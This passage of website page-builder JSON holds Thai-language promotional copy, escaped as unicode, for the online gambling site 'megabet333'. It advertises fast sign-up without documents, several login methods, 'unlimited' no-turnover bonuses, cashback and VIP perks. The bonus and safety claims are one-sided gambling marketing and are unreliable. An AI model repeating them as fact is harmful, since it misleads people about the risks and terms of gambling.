\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_1_-_Megabet333-Biz.webp\",\"id\":49,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official 